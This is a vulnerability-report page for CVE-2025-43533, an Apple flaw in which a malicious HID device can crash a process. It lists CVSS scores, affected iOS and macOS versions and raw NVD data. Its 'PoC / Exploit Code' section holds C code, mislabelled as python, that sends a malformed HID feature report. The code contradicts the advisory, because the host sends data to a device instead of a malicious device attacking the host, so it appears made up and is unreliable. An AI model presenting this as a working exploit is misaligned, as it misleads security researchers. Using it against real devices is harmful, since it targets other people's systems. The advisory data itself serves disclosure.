Security Vulnerability Report
中文
CVE-2025-43533 CVSS 5.7 MEDIUM

CVE-2025-43533

Published: 2025-12-17 21:16:12
Last Modified: 2026-04-02 19:21:01
Source: [email protected]

Description

The issue was addressed with improved bounds checks. This issue is fixed in iOS 18.7.5 and iPadOS 18.7.5, iOS 26.2 and iPadOS 26.2, macOS Sequoia 15.7.4, macOS Sonoma 14.8.4, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, watchOS 26.2. A malicious HID device may cause an unexpected process crash.

CVSS Details

CVSS Score
5.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE
Apple iOS < 18.7.5
Apple iPadOS < 18.7.5
Apple iOS < 26.2
Apple iPadOS < 26.2
Apple macOS Sequoia < 15.7.4
Apple macOS Sonoma < 14.8.4
Apple macOS Tahoe < 26.2
Apple tvOS < 26.2
Apple visionOS < 26.2
Apple watchOS < 26.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-43533 PoC - Malicious HID Device Simulation // This PoC demonstrates sending malformed HID reports to trigger the vulnerability // Note: Requires physical access or adjacent network to target device #include <IOKit/hid/IOHIDManager.h> #include <IOKit/usb/IOUSBLib.h> // Malformed HID report designed to trigger boundary check failure unsigned char maliciousHIDReport[] = { 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; void trigger_vulnerability(IOHIDDeviceRef device) { // Send malformed HID report exceeding expected buffer size IOReturn result = IOHIDDeviceSetReport( device, kIOHIDReportTypeFeature, 0x00, maliciousHIDReport, sizeof(maliciousHIDReport) ); if (result == kIOReturnSuccess) { printf("[+] Malicious HID report sent successfully\n"); printf("[+] Target process may crash due to boundary check failure\n"); } return; } // For demonstration only - actual exploitation requires device-specific knowledge

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43533", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:12.070", "lastModified": "2026-04-02T19:21:00.850", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed with improved bounds checks. This issue is fixed in iOS 18.7.5 and iPadOS 18.7.5, iOS 26.2 and iPadOS 26.2, macOS Sequoia 15.7.4, macOS Sonoma 14.8.4, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, watchOS 26.2. A malicious HID device may cause an unexpected process crash."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EA029506-5678-444B-93B5-27DAD643A1C0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "6276FDCA-3407-4FDD-8437-B57C98A97084"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "E0BBFB45-21F3-4B72-8DB1-BE72AFE0D2AB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EB10D901-4800-4DF9-AB35-48017C178161"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "15574823-ECE0-4394-99BC-6AFA34E599CC"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125889", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125890", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125891", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126347", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/126349", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/126350", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.